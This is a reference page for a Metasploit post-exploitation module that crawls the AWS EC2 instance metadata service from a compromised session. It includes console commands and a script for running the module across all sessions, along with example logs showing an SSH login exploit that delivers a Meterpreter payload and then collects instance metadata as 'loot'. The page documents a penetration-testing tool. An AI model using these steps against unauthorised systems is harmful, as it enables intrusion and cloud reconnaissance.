Gather AWS EC2 Instance Metadata - Metasploit


This page contains detailed information about how to use the post/multi/gather/aws_ec2_instance_metadata metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Gather AWS EC2 Instance Metadata
Module: post/multi/gather/aws_ec2_instance_metadata
Source code: modules/post/multi/gather/aws_ec2_instance_metadata.rb
Disclosure date: -
Last modification time: 2018-08-02 15:55:24 +0000
Supported architecture(s): -
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will attempt to connect to the AWS EC2 instance metadata service and crawl and collect all metadata known about the session'd host.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/multi/gather/aws_ec2_instance_metadata

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/multi/gather/aws_ec2_instance_metadata
msf post(aws_ec2_instance_metadata) > show options
    ... show and set options ...
msf post(aws_ec2_instance_metadata) > set SESSION session-id
msf post(aws_ec2_instance_metadata) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/gather/aws_ec2_instance_metadata")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

Vulnerable Application

This module uses an existing session on an AWS EC2 instance to gather the metadata about the instance. As such, any EC2 instance with curl is an applicable target.

Verification Steps

  1. Get session
  2. Do use post/multi/gather/aws_ec2_instance_metadata
  3. Do set SESSION <session id>
  4. Do run
  5. See loot.

Options

Set VERBOSE to true if you would like the AWS EC2 instance metadata to be shown in addition to being stored.

Scenarios

Default, non-verbose mode:

  resource (msf.rc)> use exploit/multi/ssh/sshexec
  resource (msf.rc)> set PASSWORD test
  PASSWORD => test
  resource (msf.rc)> set USERNAME test
  USERNAME => test
  resource (msf.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
  PAYLOAD => linux/x86/meterpreter/bind_tcp
  resource (msf.rc)> set RHOST 192.168.2.2
  RHOST => 192.168.2.2
  resource (msf.rc)> run -j
  [*] Exploit running as background job.
  resource (msf.rc)> sleep 10
  [*] Started bind handler
  [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
  [*] 192.168.2.2:22 - Sending stager...
  [*] Command Stager progress -  42.09% done (306/727 bytes)
  [*] Sending stage (1495599 bytes) to 192.168.2.2
  [*] Command Stager progress - 100.00% done (727/727 bytes)
  [*] Meterpreter session 1 opened (192.168.1.149:52075 -> 192.168.2.2:4444) at 2016-09-30 06:40:44 -0700

  resource (msf.rc)> use post/multi/gather/aws_ec2_instance_metadata
  resource (msf.rc)> set SESSION 1
  SESSION => 1
  resource (msf.rc)> run
  [*] Gathering AWS EC2 instance metadata
  [+] Saved AWS EC2 instance metadata to to /Users/jhart/.msf4/loot/20160930064126_default_192.168.2.2_aws.ec2.instance_509214.txt
  [*] Post module execution completed

Non-default, verbose mode:

  resource (msf.rc)> use exploit/multi/ssh/sshexec
  resource (msf.rc)> set PASSWORD test
  PASSWORD => test
  resource (msf.rc)> set USERNAME test
  USERNAME => test
  resource (msf.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
  PAYLOAD => linux/x86/meterpreter/bind_tcp
  resource (msf.rc)> set RHOST 192.168.2.2
  RHOST => 192.168.2.2
  resource (msf.rc)> run -j
  [*] Exploit running as background job.
  resource (msf.rc)> sleep 10
  [*] Started bind handler
  [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
  [*] 192.168.2.2:22 - Sending stager...
  [*] Command Stager progress -  42.09% done (306/727 bytes)
  [*] Sending stage (1495599 bytes) to 192.168.2.2
  [*] Command Stager progress - 100.00% done (727/727 bytes)
  [*] Meterpreter session 1 opened (192.168.1.149:52775 -> 192.168.2.2:4444) at 2016-09-30 06:55:54 -0700
  resource (msf.rc)> use post/multi/gather/aws_ec2_instance_metadata
  resource (msf.rc)> set SESSION 1
  SESSION => 1
  resource (msf.rc)> set VERBOSE true
  VERBOSE => true
  resource (msf.rc)> run
  [*] Fetching http://169.254.169.254/latest/meta-data/
  [*] Gathering AWS EC2 instance metadata
  [*] Fetching http://169.254.169.254/latest/meta-data/ami-id
  [*] Fetching http://169.254.169.254/latest/meta-data/ami-launch-index
  [*] Fetching http://169.254.169.254/latest/meta-data/ami-manifest-path
  [*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/
  [*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/ami
  [*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/root
  [*] Fetching http://169.254.169.254/latest/meta-data/hostname
  [*] Fetching http://169.254.169.254/latest/meta-data/instance-action
  [*] Fetching http://169.254.169.254/latest/meta-data/instance-id
  [*] Fetching http://169.254.169.254/latest/meta-data/instance-type
  [*] Fetching http://169.254.169.254/latest/meta-data/local-hostname
  [*] Fetching http://169.254.169.254/latest/meta-data/local-ipv4
  [*] Fetching http://169.254.169.254/latest/meta-data/mac
  [*] Fetching http://169.254.169.254/latest/meta-data/metrics/
  [*] Fetching http://169.254.169.254/latest/meta-data/metrics/vhostmd
  [*] Fetching http://169.254.169.254/latest/meta-data/network/
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/device-number
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/interface-id
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/ipv4-associations/
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/ipv4-associations/192.168.2.2
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/local-hostname
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/local-ipv4s
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/mac
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/owner-id
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/public-hostname
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/public-ipv4s
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/security-group-ids
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/security-groups
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/subnet-id
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/subnet-ipv4-cidr-block
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-id
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-ipv4-cidr-block
  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-ipv4-cidr-blocks
  [*] Fetching http://169.254.169.254/latest/meta-data/placement/
  [*] Fetching http://169.254.169.254/latest/meta-data/placement/availability-zone
  [*] Fetching http://169.254.169.254/latest/meta-data/profile
  [*] Fetching http://169.254.169.254/latest/meta-data/public-hostname
  [*] Fetching http://169.254.169.254/latest/meta-data/public-ipv4
  [*] Fetching http://169.254.169.254/latest/meta-data/public-keys/
  [*] Fetching http://169.254.169.254/latest/meta-data/public-keys/0/
  [*] Fetching http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
  [*] Fetching http://169.254.169.254/latest/meta-data/reservation-id
  [*] Fetching http://169.254.169.254/latest/meta-data/security-groups
  [*] Fetching http://169.254.169.254/latest/meta-data/services/
  [*] Fetching http://169.254.169.254/latest/meta-data/services/domain
  [*] Fetching http://169.254.169.254/latest/meta-data/services/partition
  [+] AWS EC2 instance metadata
  {
    "ami-id": "ami-2d39803a",
    "ami-launch-index": "0",
    "ami-manifest-path": "(unknown)",
    "block-device-mapping": {
      "ami": "/dev/sda1",
      "root": "/dev/sda1"
    },
    "hostname": "ip-192.168.2.2.ec2.internal",
    "instance-action": "none",
    "instance-id": "i-16fffae",
    "instance-type": "t2.medium",
    "local-hostname": "ip-192.168.2.2.ec2.internal",
    "local-ipv4": "192.168.2.2",
    "mac": "aa:bb:cc:dd:ee:ff",
    "metrics": {
      "vhostmd": "<xml version=\"1.0\" encoding=\"UTF-8\"?>"
    },
    "network": {
      "interfaces": {
        "macs": {
          "aa:bb:cc:dd:ee:ff": {
            "device-number": "0",
            "interface-id": "eni-1234ff",
            "ipv4-associations": {
              "192.168.2.2": "192.168.2.2"
            },
            "local-hostname": "ip-192.168.2.2.ec2.internal",
            "local-ipv4s": "192.168.2.2",
            "mac": "aa:bb:cc:dd:ee:ff",
            "owner-id": "186638383",
            "public-hostname": "ec2-192.168.2.2.compute-1.amazonaws.com",
            "public-ipv4s": "192.168.2.2",
            "security-group-ids": "sg-123a7",
            "security-groups": "launch-wizard-15",
            "subnet-id": "subnet-123453d",
            "subnet-ipv4-cidr-block": "192.0.2.0/24",
            "vpc-id": "vpc-fffffff",
            "vpc-ipv4-cidr-block": "192.0.0.0/16",
            "vpc-ipv4-cidr-blocks": "192.0.0.0/16"
          }
        }
      }
    },
    "placement": {
      "availability-zone": "us-east-1e"
    },
    "profile": "default-hvm",
    "public-hostname": "ec2-192.168.2.2.compute-1.amazonaws.com",
    "public-ipv4": "192.168.2.2",
    "public-keys": {
      "0": {
        "openssh-key": "ssh-rsa <...redacted...> jhart"
      }
    },
    "reservation-id": "r-8675309",
    "security-groups": "launch-wizard-15",
    "services": {
      "domain": "amazonaws.com",
      "partition": "aws"
    }
  }
  [+] Saved AWS EC2 instance metadata to to /Users/jhart/.msf4/loot/20160930065628_default_192.168.2.2_aws.ec2.instance_622503.txt
  [*] Post module execution completed

Go back to menu.

Msfconsole Usage

Here is how the multi/gather/aws_ec2_instance_metadata post exploitation module looks in the msfconsole:

msf6 > use post/multi/gather/aws_ec2_instance_metadata

msf6 post(multi/gather/aws_ec2_instance_metadata) > show info

       Name: Gather AWS EC2 Instance Metadata
     Module: post/multi/gather/aws_ec2_instance_metadata
   Platform: Unix
       Arch: 
       Rank: Normal

Provided by:
  Jon Hart <[email protected]>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module will attempt to connect to the AWS EC2 instance metadata 
  service and crawl and collect all metadata known about the session'd 
  host.

References:
  http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

Module Options

This is a complete list of options available in the multi/gather/aws_ec2_instance_metadata post exploitation module:

msf6 post(multi/gather/aws_ec2_instance_metadata) > show options

Module options (post/multi/gather/aws_ec2_instance_metadata):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options

Here is a complete list of advanced options supported by the multi/gather/aws_ec2_instance_metadata post exploitation module:

msf6 post(multi/gather/aws_ec2_instance_metadata) > show advanced

Module advanced options (post/multi/gather/aws_ec2_instance_metadata):

   Name       Current Setting                           Required  Description
   ----       ---------------                           --------  -----------
   TARGETURI  http://169.254.169.254/latest/meta-data/  yes       AWS EC2 Instance metadata URI
   VERBOSE    false                                     no        Enable detailed status messages
   WORKSPACE                                            no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the multi/gather/aws_ec2_instance_metadata module can do:

msf6 post(multi/gather/aws_ec2_instance_metadata) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the multi/gather/aws_ec2_instance_metadata post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(multi/gather/aws_ec2_instance_metadata) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Session does not appear to be on an AWS EC2 instance

Here is a relevant code snippet related to the "Session does not appear to be on an AWS EC2 instance" error message:

35:	  end
36:	
37:	  def check_aws_metadata
38:	    resp = simple_get(@target_uri)
39:	    unless resp =~ /^instance-id$/
40:	      fail_with(Failure::BadConfig, "Session does not appear to be on an AWS EC2 instance")
41:	    end
42:	    resp
43:	  end
44:	
45:	  def check_curl

curl is not installed

Here is a relevant code snippet related to the "curl is not installed" error message:

42:	    resp
43:	  end
44:	
45:	  def check_curl
46:	    unless cmd_exec("curl --version") =~ /^curl \d/
47:	      fail_with(Failure::BadConfig, 'curl is not installed')
48:	    end
49:	  end
50:	
51:	  def get_aws_metadata(base_uri, base_resp)
52:	    r = {}

Invalid TARGETURI: <TARGETURI>

Here is a relevant code snippet related to the "Invalid TARGETURI: <TARGETURI>" error message:

87:	
88:	  def setup
89:	    begin
90:	      @target_uri ||= URI(datastore['TARGETURI'])
91:	    rescue ::URI::InvalidURIError
92:	      fail_with(Failure::BadConfig, "Invalid TARGETURI: #{datastore['TARGETURI']}")
93:	    end
94:	  end
95:	
96:	  def simple_get(url)
97:	    vprint_status("Fetching #{url}")

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • Jon Hart <jon_hart[at]rapid7.com>

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.